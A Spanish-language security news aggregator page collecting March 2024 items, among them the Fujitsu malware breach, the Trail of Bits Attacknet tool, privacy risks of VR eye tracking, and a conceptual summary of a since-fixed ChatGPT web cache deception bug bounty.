Security Posts

Infocon: green

ISC Stormcast For Tuesday, March 19th, 2024 https://isc.sans.edu/podcastdetail/8900
Categorías: Security Posts

ISC Stormcast For Tuesday, March 19th, 2024 https://isc.sans.edu/podcastdetail/8900, (Tue, Mar 19th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categorías: Security Posts

Apple may hire Google to power new iPhone AI features using Gemini—report

ArsTechnica: Security Content - Lun, 2024/03/18 - 21:56
Enlarge (credit: Benj Edwards) On Monday, Bloomberg reported that Apple is in talks to license Google's Gemini model to power AI features like Siri in a future iPhone software update coming later in 2024, according to people familiar with the situation. Apple has also reportedly conducted similar talks with ChatGPT maker OpenAI. The potential integration of Google Gemini into iOS 18 could bring a range of new cloud-based (off-device) AI-powered features to Apple's smartphone, including image creation or essay writing based on simple prompts. However, the terms and branding of the agreement have not yet been finalized, and the implementation details remain unclear. The companies are unlikely to announce any deal until Apple's annual Worldwide Developers Conference in June. Gemini could also bring new capabilities to Apple's widely criticized voice assistant, Siri, which trails newer AI assistants powered by large language models (LLMs) in understanding and responding to complex questions. Rumors of Apple's own internal frustration with Siri—and potential remedies—have been kicking around for some time. In January, 9to5Mac revealed that Apple had been conducting tests with a beta version of iOS 17.4 that used OpenAI's ChatGPT API to power Siri.Read 5 remaining paragraphs | Comments
Categorías: Security Posts

Fujitsu says it found malware on its corporate network, warns of possible data breach

ArsTechnica: Security Content - Lun, 2024/03/18 - 21:44
Enlarge (credit: Getty Images) Japan-based IT behemoth Fujitsu said it has discovered malware on its corporate network that may have allowed the people responsible to steal personal information from customers or other parties. “We confirmed the presence of malware on several of our company's work computers, and as a result of an internal investigation, it was discovered that files containing personal information and customer information could be illegally taken out,” company officials wrote in a March 15 notification that went largely unnoticed until Monday. The company said it continued to “investigate the circumstances surrounding the malware's intrusion and whether information has been leaked.” There was no indication how many records were exposed or how many people may be affected. Fujitsu employs 124,000 people worldwide and reported about $25 billion of revenue in its fiscal 2023, which ended at the end of last March. The company operates in 100 countries. Past customers include the Japanese government. Fujitsu’s revenue comes from sales of hardware such as computers, servers, and telecommunications gear, storage systems, software, and IT services.Read 3 remaining paragraphs | Comments
Categorías: Security Posts

Dell tells remote workers that they won’t be eligible for promotion

ArsTechnica: Security Content - Lun, 2024/03/18 - 21:07
Enlarge (credit: Getty) Starting in May, Dell employees who are fully remote will not be eligible for promotion, Business Insider (BI) reported Saturday. The upcoming policy update represents a dramatic reversal from Dell's prior stance on work from home (WFH), which included CEO Michael Dell saying: "If you are counting on forced hours spent in a traditional office to create collaboration and provide a feeling of belonging within your organization, you’re doing it wrong." Dell employees will mostly all be considered "remote" or "hybrid" starting in May, BI reported. Hybrid workers have to come into the office at least 39 days per quarter, Dell confirmed to Ars Technica, which equates to approximately three times a week. Those who would prefer to never commute to an office will not "be considered for promotion, or be able to change roles," BI reported. "For remote team members, it is important to understand the trade-offs: Career advancement, including applying to new roles in the company, will require a team member to reclassify as hybrid onsite," Dell's memo to workers said, per BI.Read 8 remaining paragraphs | Comments
Categorías: Security Posts

Elon Musk’s xAI releases Grok source and weights, taunting OpenAI

ArsTechnica: Security Content - Lun, 2024/03/18 - 18:55
Enlarge / An AI-generated image released by xAI during the open-weights launch of Grok-1. (credit: xAI) On Sunday, Elon Musk's AI firm xAI released the base model weights and network architecture of Grok-1, a large language model designed to compete with the models that power OpenAI's ChatGPT. The open-weights release through GitHub and BitTorrent comes as Musk continues to criticize (and sue) rival OpenAI for not releasing its AI models in an open way. Announced in November, Grok is an AI assistant similar to ChatGPT that is available to X Premium+ subscribers who pay $16 a month to the social media platform formerly known as Twitter. At its heart is a mixture-of-experts LLM called "Grok-1," clocking in at 314 billion parameters. As a reference, GPT-3 included 175 billion parameters. Parameter count is a rough measure of an AI model's complexity, reflecting its potential for generating more useful responses. xAI is releasing the base model of Grok-1, which is not fine-tuned for a specific task, so it is likely not the same model that X uses to power its Grok AI assistant. "This is the raw base model checkpoint from the Grok-1 pre-training phase, which concluded in October 2023," writes xAI on its release page. "This means that the model is not fine-tuned for any specific application, such as dialogue," meaning it's not necessarily shipping as a chatbot. But it will do next-token prediction, meaning it will complete a sentence (or other text prompt) with its estimation of the most relevant string of text.Read 9 remaining paragraphs | Comments
Categorías: Security Posts

Releasing the Attacknet: A new tool for finding bugs in blockchain nodes using chaos testing

By Benjamin Samuels (@thebensams) Today, Trail of Bits is publishing Attacknet, a new tool that addresses the limitations of traditional runtime verification tools, built in collaboration with the Ethereum Foundation. Attacknet is intended to augment the EF’s current test methods by subjecting their execution and consensus clients to some of the most challenging network conditions imaginable. Blockchain nodes must be held to the highest level of security assurance possible. Historically, the primary tools used to achieve this goal have been exhaustive specification, tests, client diversity, manual audits, and testnets. While these tools have traditionally done their job well, they collectively have serious limitations that can lead to critical bugs manifesting in a production environment, such as the May 2023 finality incident that occurred on Ethereum mainnet. Attacknet addresses these limitations by subjecting devnets to a much wider range of network conditions and misconfigurations than is possible on a conventional testnet. How Attacknet works Attacknet uses chaos engineering, a testing methodology that proactively injects faults into a production environment to verify that the system is tolerant to certain failures. These faults reproduce real-world problem scenarios and misconfigurations, and can be used to create exaggerated scenarios to test the boundary conditions of the blockchain. Attacknet uses Chaos Mesh to inject faults into a devnet environment generated by Kurtosis. By building on top of Kurtosis and Chaos Mesh, Attacknet can create various network topologies with ensembles of different kinds of faults to push a blockchain network to its most extreme edge cases. Some of the faults include:
  • Clock skew, where a node’s clock is skewed forwards or backwards for a specific duration. Trail of Bits was able to reproduce the Ethereum finality incident using a clock skew fault, as detailed in our TrustX talk last year.
  • Network latency, where a node’s connection to the network (or its corresponding EL/CL client) is delayed by a certain amount of time. This fault can help reproduce global latency conditions or help detect unintentional synchronicity assumptions in the blockchain’s consensus.
  • Network partition, where the network is split into two or more halves that cannot communicate with each other. This fault can test the network’s fork choice rule, ability to re-org, and other edge cases.
  • Network packet drop/corruption, where gossip packets are dropped or have their contents corrupted by a certain amount. This fault can test a node’s gossip validation and test the robustness of the network under hostile network conditions.
  • Forced node crashes/offlining, where a certain client or type of client is ungracefully shut down. This fault can test the network’s resilience to validator inactivity, and test the ability of clients to re-sync to the network.
  • I/O disk faults/latency, where a certain amount of latency or error rate is applied to all I/O operations a node makes. This fault can help profile nodes to understand their resource requirements, as I/O is often the largest limiting factor of node performance.
Once the fault concludes, Attacknet performs a battery of health checks against each node in the network to verify that they were able to recover from the fault. If all nodes recover from the fault, Attacknet moves on to the next configured fault. If one or more nodes fail health checks, Attacknet will generate an artifact of logs and test information to allow debugging. Future work In this first release, Attacknet supports two run modes: one with a manually configured network topology and fault parameters, and a “planner mode” where a range of faults are run against a specific client with loosely defined topology parameters. In the future, we plan on adding an “Exploration mode” that will dynamically define fault parameters, inject them, and monitor network health repeatedly, similar to a fuzzer. Attacknet is currently being used to test the Dencun hard fork, and is being regularly updated to improve coverage, performance, and debugging UX. However, Attacknet is not an Ethereum-specific tool, and was designed to be modular and easily extended to support other types of chains with drastically different designs and topologies. In the future, we plan on extending Attacknet to target other chains, including other types of blockchain systems such as L2s. If you’re interested in integrating Attacknet with your chain/L2’s testing process, please contact us.
Categorías: Security Posts

Exploring the risks of eye-tracking technology in VR security

AlienVault Blogs - Lun, 2024/03/18 - 12:00
The content of this post is solely the responsibility of the author.  AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article.  Virtual reality (VR) offers profound benefits across industries, particularly in education and training, thanks to its immersive nature. Through derivatives, such as 3D learning environments, VR enables learners to gain a deeper understanding of theoretical concepts more quickly and efficiently.  However, with the benefits come some dangers. One such risk is the integration of eye-tracking technology within virtual reality environments. While eye-tracking promises to make experiences better and improve security through biometric verification, it also raises privacy concerns.  This technology, though handy, could be exploited by cybercriminals. For instance, a recent paper by Rutgers University shows that hackers could use common virtual reality (AR/VR) headsets with motion sensors to capture facial movements linked to speech. This could lead to the theft of sensitive data communicated through voice commands, like credit card numbers and passwords.  This article explores the risks of this new technology, looking into how the information collected from our eyes could be misused and what it means for our security in virtual worlds. How does VR eye-tracking work? Eye-tracking technology in virtual reality (VR) is a sophisticated system designed to monitor and analyze where and how a user's gaze moves when they are immersed in a VR environment.  It achieves this through the use of infrared sensors and cameras embedded in the VR headset. These sensors aim infrared light toward the eyes, and the cameras capture the reflection of this light off the cornea and the position of the pupil. It then analyzes these reflections and positions to accurately determine the direction in which the user is looking.  Once the eye-tracking system gathers this data, it processes the information in real time, using sophisticated algorithms to interpret the user's gaze direction, eye movements, and other metrics such as pupil dilation and blink rate.  This comprehensive data allows the VR system to understand precisely where the user is focusing their attention within the virtual environment.  At the rate at which VR technology is growing, most people instantly think of monitoring and data selling, but also, at the same time, it’s not all doom and gloom. We might be moving towards a futuristic workplace, where we can focus on creative aspects of our job. Imagine a developer being able to receive suggestions about cloud cost optimization or writing cleaner, more readable code. Still, the concerns are yet to be addressed. Privacy concerns with eye-tracking technology Don’t get us wrong—eye-tracking technology can have many benefits. For instance, it has been used to identify cognitive disorders such as autism and attention deficit disorder, as well as mental and psychological illnesses like schizophrenia and Alzheimer's. It can also provide insights into a person's behavior, including potential indicators of drug and alcohol use.  The data that it collects sometimes can also go beyond just where an individual is looking, and it’s been one of the main issues surrounding VR games. While the notion of monetizing eye-tracking data is still a theoretical one, there’s a lot that companies can infer from it.  This capability extends to understanding which advertisements catch our attention, how we process information on a webpage, and our reactions to various stimuli. While it may seem great to have your VR headset track your activity in the game and serve you the best suggestions to buy a WordPress plugin, provide you with ideas for your domain name, or use AI to generate helpful answers, the true possibilities are much more sinister.  Thus, safeguarding this data through robust privacy policies and data-centric security practices is essential to mitigate the risks associated with its misuse. As eye-tracking devices are starting to parallel the ubiquity of webcams, regulators must stay ahead of data-hungry corporations. Potential for misuse of eye-tracking data Eye-tracking technology, while innovative and rich in potential for enhancing user experiences in various fields, including VR, also harbors significant risks regarding data privacy and security.  The detailed data captured by eye-tracking — ranging from where individuals look, and how long they gaze at specific points to more subtle metrics like pupil dilation — can reveal an enormous amount about a person's preferences, interests, and even their emotional or psychological state.  This raises a significant ethical dilemma: What if companies like Google suddenly begin collecting and storing data on users' eye movements? This could pose a problem for organizations planning to adopt VR technology in the future, especially those handling sensitive data.  With an ever-more privacy-aware consumer base, they might even be compelled to look for a GCP alternative, different email hosting providers, and a host of other solutions to protect their users' privacy and adapt to their preferences.  The potential risks of eye-tracking data misuse are vast and varied — here is a concise overview of some of the more pressing issues: 
  1. Personal profiling. Eye-tracking data can be used to construct detailed profiles of users, including their interests, habits, and behaviors. This information could potentially be exploited for targeted advertising in a way that infringes on personal privacy.
  2. Surveillance. In the wrong hands, eye-tracking data could serve as a tool for surveillance, allowing unauthorized tracking of an individual's focus and attention in both digital and physical spaces.
  3. Manipulation and influence. Figuring out what captures a person's attention or triggers emotional responses could give other people or organizations the power to manipulate decisions. Imagine WordPress taping into its database of 455 million websites and using eye-tracking data to suggest plugins and other products to those they think will be more likely to purchase them.
  4. Security breaches. Like any digital data, eye-tracking information is susceptible to hacking and unauthorized access. If such data were compromised, it could lead to identity theft, blackmail, or other forms of cybercrime, particularly if combined with other personal data.
  5. Unintended inferences. Eye-tracking could inadvertently expose sensitive information about a person's health (e.g., detecting conditions like Parkinson's or Alzheimer's disease based on eye movement patterns) or other personal attributes without their consent. 
To mitigate these risks, robust data protection measures, transparent user consent processes, and strict regulatory frameworks need to be established and enforced. Users should be fully informed about what data is being collected, how it is being used, and who has access to it, ensuring a balance between technological advancement and the protection of individual privacy rights. Mitigating the risks To mitigate the risks associated with eye-tracking technology, VR companies can encrypt the data collected by eye-tracking technology to ensure that even if the data is intercepted, it remains inaccessible to unauthorized users. Encryption should be applied both during data transmission and when storing data.  For instance, a contractor should be able to use a Star Trek-like iteration  of virtual reality, not as the holodeck, but in the form of specialized roofing software that allows them to observe roofs they’ll work for in VR without worrying about leaving traces of their personal data online.  Companies can also anonymize data. Anonymizing data means stripping away personally identifiable information so that the data cannot be traced back to an individual. This technique can be particularly useful for research or aggregate analysis, where individual user details are not necessary.  Innovation in privacy-preserving technologies can enable the benefits of eye-tracking in VR while minimizing data collection. For example, processing data locally on the device and only transmitting necessary, anonymized data to servers can reduce privacy risks. Conclusion As eye-tracking tech grows, it'll take us to amazing places we've only dreamed of. But the real success is making sure we protect people's privacy and respect them in these digital worlds. As we explore these new technologies, we must also remember the values that make us human.  Talking and working together — tech creators, law experts, policymakers, and users — is key to making sure eye-tracking in VR and AR is good for us without risking our privacy or safety. It's important to be open, let people control their own data, and work with others to find a good balance between new inventions and privacy.
Categorías: Security Posts

Cómo robar cuentas de ChatGPT con "Wildcard Web Cache Deception"

Un informático en el lado del mal - Lun, 2024/03/18 - 07:01
Si ayer os hablaba de tres bugs descubiertos en un Bug Bounty de ChatGPT, hoy os traigo otro que salió publicado este mes de Febrero y que habla de cómo robar cuentas de ChatGPT utilizando Wildcard Web Cache Deception , que es más que interesante, y que le valió 6.500 USD al investigador que lo descubrió.
Figura 1: Cómo robar cuentas de ChatGPT con "Wildcard Web Cache Deception"
El bug ha sido publicado una vez resuelto, pero es bastante curioso, ya que el problema se encuentra en la implementación que se hacía de la Cache de ChatGPT, y que el investigador explotó para hacer un ataque funcional que permitiera robar las cuentas de cualquier usuario que hiciera clic en un enlace malicioso, para ganarse su Bug Bounty.
Figura 2: Libro de Bug Bounty: De profesión "Cazarrecompensas"en 0xWord, escrito por Pablo García
Según cuenta en el artículo el propio descubridor del bug, se dio cuenta porque ChatGPT le estaba cachenado una petición cuando había dado a la opción de Share para compartir una conversación. Aunque siguiera actualizando la conversación, esta se quedaba estática en el enlace de compartición, porque todo lo que estuviera bajo /share/ se cacheaba automáticamente una vez visitada esa URL, ya que el servidor estaba usando el HTTP-Header Cf-Cache-Status:HIT en esa URL.
Figura 3: El Path Share se estaba cacheando automáticamente.
Sabiendo esto, lo siguiente era ver si podía generar una URL que tuviera el Token de autenticación de un usuario, pero bajo la dirección de una URL con el path /share/, y esto es posible porque la cache no es un servidor web que esté procesando la URL, y la está tomando como una dirección para generar un  Figura 4: Path Transversal Confusion
ID
de objeto cacheado, así que si se utilizan %2F o wildcards para construir una URL que el servidor Web sí va a procesar, el servicio de Caché no lo va a hacer.
Figura 5: Las URLs para el el ataque
Una vez comprobado eso, basta con generar la URL correcta para que el usuario entregue su Token de autenticación, pase el proceso de autenticarse (o no), y deje su Token guardado en la caché para poder ser accedido después por el atacante.
Figura 6: El esquema de ataque completo
En este caso, es necesario que la víctima haga clic en un enlace malicioso, tal y como se muestra en el esquema de ataque, pero es un 1-Click Owned! esquema, muy peligroso, que ChatGPT ya ha corregido, para eliminar este problema.

Figura 7: Hacker & Developer in the Age of GenAI LLM Apps & Services
Al final, no es un problema del LLM, y no podríamos meterlo en ningún esquema del OWASP TOP 10 de LLM Apps & Services, que el problema es la implementación del sistema de compartición, pero es más que interesante cómo funciona este bug.
¡Saludos Malignos!
Autor: Chema Alonso (Contactar con Chema Alonso)  


Sigue Un informático en el lado del mal RSS 0xWord
- Contacta con Chema Alonso en MyPublicInbox.com
Categorías: Security Posts

Cybersecurity Concerns for Ancillary Strength Control Subsystems

BreakingPoint Labs Blog - Jue, 2023/10/19 - 19:08
Additive manufacturing (AM) engineers have been incredibly creative in developing ancillary systems that modify a printed parts mechanical properties.  These systems mostly focus on the issue of anisotropic properties of additively built components.  This blog post is a good reference if you are unfamiliar with isotropic vs anisotropic properties and how they impact 3d printing.  […] The post Cybersecurity Concerns for Ancillary Strength Control Subsystems appeared first on BreakPoint Labs - Blog.
Categorías: Security Posts

Update on Naked Security

Naked Security Sophos - Mar, 2023/09/26 - 12:00
To consolidate all of our security intelligence and news in one location, we have migrated Naked Security to the Sophos News platform.
Categorías: Security Posts

Jue, 1970/01/01 - 02:00
Distribuir contenido